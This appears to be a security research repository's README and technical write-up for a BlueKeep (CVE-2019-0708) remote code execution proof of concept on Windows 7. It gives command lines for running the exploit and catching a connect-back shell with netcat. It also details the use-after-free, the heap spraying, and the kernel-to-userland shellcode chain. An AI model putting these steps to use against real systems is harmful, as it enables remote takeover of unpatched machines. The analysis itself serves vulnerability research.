CVE-2019-0708 (BlueKeep) pre-auth RCE POC on Windows 7

This repository demonstrates the remote code execution bug in Windows Remote Desktop Services (RDS).

This repository contains the POC code and a technical report on the BlueKeep vulnerability that we developed earlier.
NOTE: Our goal is to help analysts gain a better understanding of critical vulnerabilities.

How to use

Prerequisites

Our exploit code is written in Python 3 and relies on the PyRDP library. Please set both up by following the PyRDP installation guide.

Usage

Currently our exploit targets, and has been tested on, Windows 7 SP1 (6.1.7601) x64 on VirtualBox.

If your computer has the IP address 192.168.56.1 and you target the RDP server at example.com:1234, then type

$ python exploit.py example.com -rp 1234 192.168.56.1

If the script successfully exploits the server, a connect-back shellcode initiates a TCP connection from the server back to 192.168.56.1:4444. You should therefore be listening for that connection beforehand, for example with netcat:

$ nc -v -l 4444

If you want to change the port number to which the server connects back, use the -bp option:

$ python exploit.py example.com -rp 1234 192.168.56.1 -bp 4567
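
The command lines above can be read as two positional arguments plus two optional ports. The following is only a sketch of how such an interface could be parsed with argparse; it is not taken from exploit.py. The names build_parser, rhost, rport, backhost and backport are hypothetical, and the default of 3389 for -rp is an assumption based on the standard RDP port. The default of 4444 for -bp matches the connect-back port mentioned above.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    """Build a parser mirroring the documented command line (illustrative only)."""
    parser = argparse.ArgumentParser(prog="exploit.py")
    # First positional: the RDP server to target (hypothetical name "rhost").
    parser.add_argument("rhost", help="host name or IP address of the RDP server")
    # -rp: port of the RDP server; 3389 is assumed as the default here.
    parser.add_argument("-rp", dest="rport", type=int, default=3389,
                        help="port of the RDP server")
    # Second positional: the address the server should connect back to.
    parser.add_argument("backhost", help="IP address to connect back to")
    # -bp: connect-back port; the text above uses 4444 when -bp is omitted.
    parser.add_argument("-bp", dest="backport", type=int, default=4444,
                        help="port to connect back to")
    return parser


if __name__ == "__main__":
    args = build_parser().parse_args()
    print(args.rhost, args.rport, args.backhost, args.backport)
```

With this sketch, the second command line above would parse to rhost example.com, rport 1234, backhost 192.168.56.1 and backport 4567.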

Report

The Vulnerability

In May 2019, Microsoft disclosed CVE-2019-0708, a critical remote code execution vulnerability in Remote Desktop Services (formerly known as Terminal Services). The vulnerability can be triggered before authentication, which makes it wormable, with the potential to cause widespread disruption. An attacker can exploit it by sending crafted Remote Desktop Protocol (RDP) messages to the target server, gaining arbitrary code execution with administrative privileges.

RDP Virtual Channel

Microsoft Remote Desktop Services lets a user open interactive Windows sessions remotely. It presents the user's Windows desktop by communicating with the user's client using the Remote Desktop Protocol (RDP) over port 3389/TCP.

RDP can be enhanced through software extensions called virtual channels. Examples of such enhancements include support for special types of hardware, audio, or other additions to the core functionality.
These channels include standard Microsoft-supported channels such as "rdpdr" (Redirection), "rdpsnd" (Sound), and "cliprdr" (Clipboard sharing). Users can write modules using the RDP API to support other channels. In addition to the above channels, Microsoft creates two channels by default: MS_T120 (used for RDP itself) and CTXTW (used in Citrix ICA).

The vulnerability lies in the binding process of the MS_T120 virtual channel, which is reached through the "MCS Connect Initial and GCC Create" request. More background information is available from ZDI.
As described in the ZDI article, all virtual channels requested by the client are created using termdd!IcaCreateChannel(). Pointers to these channel structures are then stored in a table, which we shall call ChannelPointerTable.
When a connection is established with an RDP client, all static virtual channels, including MS_T120, are initialized internally by the Windows RDP server and pointed to by ChannelPointerTable.

The query to create MS_T120 and CTXTW is issued by rdpcore!WDLIB_IcaVirtualQueryBindings().

Fig .1: Generation of the query for creating MS_T120 and CTXTW

After the query is passed to termdd!IcaBindVirtualChannels(), a virtual channel structure is created in termdd!IcaAllocateChannel() and registered to ChannelPointerTable.

Fig .2: Creating and registering virtual channel structure

The routine termdd!IcaBindChannel() is responsible for registering a virtual channel structure in ChannelPointerTable.
Here is the stack trace on Windows 7 x64 when termdd!IcaBindChannel() is called with "MS_T120" as the first argument and 0x1f as the third argument.

Fig .3: MS_T120 is bound to slot 0x1f during the initial request

Then ChannelPointerTable looks as follows. Note that MS_T120 is always present in Slot 0x1F.

Fig .4: ChannelPointerTable during the initial request

Root Cause Analysis

A use-after-free vulnerability exists in the Windows RDP kernel driver, termdd.sys.
The problem is that when a client specifies a channel named MS_T120\x00 during "MCS Connect Initial and GCC Create", termdd!IcaCreateChannel() calls termdd!IcaFindChannelByName(), which returns the existing MS_T120 channel structure in Slot 0x1F. This channel structure is then treated as a new virtual channel entry and stored in another slot (in this example, Slot 2) during "MCS Attach User Request".
Here is the stack trace on Windows 7 x64 when termdd!IcaBindChannel() is called with "MS_T120" as the first argument and 0x2 as the third argument.

Fig .5: MS_T120 is also bound to slot 0x2 during the attach request

In other words, the MS_T120 channel structure is pointed to by two slots, 0x1F and 0x2.

Fig .6: ChannelPointerTable during attach request

If an attacker then sends invalid data to the MS_T120 channel, termdd.sys closes the channel using termdd!IcaCloseChannel(), which frees the channel structure and clears the pointer in the slot used (Slot 2 in the running example).
However, the same pointer in Slot 0x1F is not cleared.
Subsequently, when the connection terminates, RDPWD!HandleDisconnectProviderUlt() is invoked, which in turn calls termdd!IcaChannelInputInternal() and attempts to destroy the already freed MS_T120 channel structure again through the pointer in Slot 0x1F. The destruction procedure is invoked through a vtable pointer inside the channel structure, which leads to a use-after-free condition.

Fig .7: vtable dereference
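
The sequence described in this section can be mimicked with a small, purely illustrative Python model. It does not touch RDP or termdd.sys. The class and method names, the table size of 0x20 slots, and the "freed" flag are all assumptions made for the illustration; only the slot numbers 0x1F and 0x2 and the lookup-by-name behavior come from the text above.

```python
class Channel:
    """Stand-in for a channel structure; 'freed' marks released memory."""

    def __init__(self, name):
        self.name = name
        self.freed = False


class ChannelPointerTable:
    SLOTS = 0x20  # assumed size, just large enough to hold slot 0x1F

    def __init__(self):
        self.slots = [None] * self.SLOTS

    def find_by_name(self, name):
        # Analogous to the lookup by name: return an existing live channel.
        for channel in self.slots:
            if channel is not None and channel.name == name:
                return channel
        return None

    def create_channel(self, name, slot):
        # Flawed step: an existing channel is reused and bound to a second slot.
        channel = self.find_by_name(name) or Channel(name)
        self.slots[slot] = channel
        return channel

    def close_channel(self, slot):
        # Frees the structure but clears only the slot it was closed through.
        self.slots[slot].freed = True
        self.slots[slot] = None

    def dangling_slots(self):
        # Slots that still point at a structure that has been freed.
        return [i for i, c in enumerate(self.slots) if c is not None and c.freed]


def simulate():
    table = ChannelPointerTable()
    table.create_channel("MS_T120", 0x1F)  # created by the server itself
    table.create_channel("MS_T120", 0x02)  # requested again by the client
    table.close_channel(0x02)              # close triggered through slot 2
    return table.dangling_slots()
```

In this model, simulate() reports slot 0x1F as still pointing at the freed structure, which corresponds to the stale pointer that is later dereferenced on disconnect.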

Heap Spraying

As explained in the previous section, RDPWD!HandleDisconnectProviderUlt() attempts to call a function through the vtable pointer within the freed channel structure. If an attacker can control the values in the channel structure, he can overwrite the vtable pointer, which leads to arbitrary code execution with kernel privileges.
To achieve this, however, there are two difficulties to overcome.

The first is how to control the values in the freed channel structure in the first place. Since the targeted vulnerability is a use-after-free, the typical and reliable approach is for the attacker to allocate memory at the same location as the freed structure.
In this case, however, there is no deterministic way for him to place his allocation at the target location. In the kernel, many threads run and allocate memory (virtually) simultaneously, so where his memory ends up depends on the order in which the threads run. In almost all cases, he cannot be certain whether the allocation landed where he intended.

The second is which values to use for the address of the vtable and for the pointers in it. As seen in the previous section, the attacker has to set the address of the vtable. To gain arbitrary code execution, he must choose it so that the fake vtable contains an address he wants to be executed (e.g. the address of a shellcode or some gadget). However, he almost certainly cannot know such a suitable address, due to the aforementioned randomness of the kernel heap and to KASLR:

He can probably allocate memory in the kernel heap and write the address of a shellcode into the allocated memory. Nevertheless, he usually cannot learn the address of that allocation, due to the randomness noted above.
The other, less likely option is to use static (non-heap) memory locations that happen to contain the address of a useful gadget, such as somewhere in the code section. However, this plan would not work well either, because Windows 7 has the KASLR mitigation, which randomizes the addresses of those memory locations.

These facts mean that an attacker cannot directly gain arbitrary code execution even if he controls the vtable pointer, unless he uses another vulnerability that leaks kernel addresses. Moreover, as you may notice, “the address of a shellcode or some gadget” is itself something the attacker cannot know.

Our exploit deals with these obstacles using a single technique: heap spraying. Heap spraying is a method of overcoming this randomness by making a large number of allocations that together occupy a large amount of memory.

Fig .8: Usage of heap pool before spraying

Fig .9: Usage of heap pool after spraying

By repeating a crafted allocation many times, an attacker can increase the probability that some of the allocated memory lands at the location of the freed channel structure.

If the majority of the objects in the kernel heap are ones prepared by the attacker, he can even blindly pick some address in the heap as the address of the fake vtable, because that address is highly likely to point into his objects. Note that the base address of the kernel heap is not randomized by KASLR. Essentially, the randomness of the heap comes only from the order of thread execution.
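
The two probabilistic arguments above can be made concrete with a toy calculation. This is only a back-of-the-envelope sketch and not a measurement of the real allocator: it assumes that each sprayed allocation independently reclaims the freed slot with the same probability, and that a guessed address is uniformly distributed over the heap region. The function names and parameters are hypothetical.

```python
def reclaim_probability(p_single: float, attempts: int) -> float:
    """Chance that at least one of `attempts` independent allocations
    lands on the freed structure, if each one succeeds with p_single."""
    return 1.0 - (1.0 - p_single) ** attempts


def guess_hit_probability(sprayed_bytes: int, region_bytes: int) -> float:
    """Chance that a uniformly chosen address inside a heap region of
    region_bytes falls into memory filled by the spray."""
    return min(1.0, sprayed_bytes / region_bytes)


if __name__ == "__main__":
    # More attempts push the reclaim probability towards 1.
    for attempts in (1, 10, 100, 1000):
        print(attempts, reclaim_probability(0.01, attempts))
    # The larger the sprayed share of the region, the safer a blind guess.
    print(guess_hit_probability(3 * 2**20, 4 * 2**20))
```

Under these simplifying assumptions, both probabilities grow with the amount of spraying, which is the intuition behind making as many large allocations as possible.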

Fortunately and most importantly, in Windows 7 the NX bit is not enabled for the non-paged kernel pool. This means an attacker can store not only the fake vtable but also the shellcode itself in the kernel heap. This makes exploitation much easier, since we do not need to employ return-oriented programming.

Fig .10: Page Table Entry (PTE) permission

For heap spraying, an attacker obviously needs functionality that lets him allocate memory in the kernel heap and write his input into it. Based on the Unit 42 report and the BlueKeep exploit in Metasploit, we searched kernel drivers for routines that provide this functionality. We tested many PDUs and concluded that the most reliable and useful way is to send Virtual Channel PDUs to the rdpsnd channel, as the Metasploit exploit does. For reference, here is why we could not adopt the three types of PDU introduced in the Unit 42 report:

Bitmap Cache PDU: first of all, an attacker can send this PDU only during the first handshake. Because the use-after-free occurs after the handshake finishes, it cannot be used for overwriting the vtable. Moreover, with this PDU an attacker can allocate only 0x2b5240 bytes (< 3MB) of memory, which is not enough for heap spraying.
Client Name Request PDU: we thought this PDU was promising for heap spraying. As far as we tested, however, it cannot be sent (or received) multiple times, at least not in a straightforward way. Due to the lack of details, we could not determine which explanation is correct: that an attacker needs to send crafted and complicated packets in order to use this PDU, or that this routine has changed and does not work in a 64-bit environment.
Refresh Rect PDU: this PDU is efficient for heap spraying in that an attacker can allocate a much larger amount of memory than the size of the data he actually sends. However, since an attacker can control only 8 bytes of data in the memory allocated by this PDU, it is difficult to make meaningful use of the allocation. We omit the details, but we think an attacker would need to control at least 13 bytes of data (8 bytes for the vtable and 5 bytes for “jmp $+0x1000”) to use this kind of PDU effectively.

A Virtual Channel PDU is, as its name suggests, exchanged between client and server to transport data over static virtual channels. How the data inside the PDU is processed varies by channel. Among the well-known channels Microsoft provides as extensions, the rdpsnd channel has the unique feature of accepting any input and allocating memory for it. Since this channel is available by default in Windows 7, we can simply send our payloads to it for heap spraying.

We wrote a proof of concept with the above points in mind and successfully achieved arbitrary code execution.

Fig .11: Controlled vtable address

Fig .12: vtable address successfully overwritten with a malicious one pointing to the shellcode (ud2)

Code Execution

Although the previous section described how to get a shellcode executed, that is not the whole story. The shellcode runs in kernel land, while what an attacker wants is administrative privileges in “userland”. The two are theoretically similar in what he can do, but they differ in how he can carry out the actions he wants. For instance, with a shellcode, an attacker may need to write a hundred lines of assembly code to list the files in some directory, whereas he can just type ‘dir’ in a privileged shell.

Thus, the goal of our exploit is to provide a privileged shell for an attacker, and that takes some more effort. Since the shellcode is executed in kernel land, it first needs to find or create a (privileged) userland thread and then execute cmd.exe in that thread. This raises two issues: how to find or create a thread, and how to allocate memory in userland for executing a shellcode there.

The first issue, finding a userland thread, arises because the context in which the shellcode runs is not an ordinary process context. If it were running within a process context, it could just use the IRET instruction to return to userland. In this case, however, executing IRET causes the kernel to freeze. There are several ways to resolve this issue, but the most general and useful one is the asynchronous procedure call (APC), the mechanism Windows provides for processing asynchronous events. An APC allows a program to execute functions in the context of a specified thread, even one in a different process. With this mechanism, the shellcode can easily and legitimately create a new userland thread.

When registering an APC, we need to specify the address from which the new userland thread starts execution. So far, however, we have allocated memory only in the kernel heap, which a userland thread clearly cannot access. To get a userland shellcode executed, we must prepare another memory location that is visible from userland and store the userland shellcode there. This is the second issue, allocating memory in userland. One possible and conventional way to deal with it is to create a new mapping with ZwAllocateVirtualMemory. This is, however, somewhat heavyweight, and there is an easier way in Windows 7: using KUSER_SHARED_DATA. KUSER_SHARED_DATA is a data structure stored in a dedicated mapping that is mapped into both userland and kernel land at fixed addresses (0x7FFE0000 and 0xFFFFF78000000000, respectively). This is a feature similar to vsyscall in Linux. If we store the userland shellcode in this mapping, everything works out: the kernel-land shellcode can copy the userland shellcode into the mapping and register the APC without difficulty, since it knows the address of the mapping.

Fig .13: Shellcode is stored in the dedicated mapping, 0x7FFE0000(usermode) and 0xFFFFF78000000000(kernelmode)

Fig .14: Body of the shellcode

Thus, there is a lot to do after gaining arbitrary code execution, although all of these steps can be solved in a fairly straightforward way. In the end, our exploit accomplished its aim.

Affected Version

This vulnerability has been assigned the CVE number CVE-2019-0708. Microsoft published the security patch KB4499175 on 2019.5.15.
You can see more details about the vulnerability, affected versions, and mitigations here.

Acknowledgement

This project was partially supported by Advanced Technology Lab, Recruit Co.,Ltd.
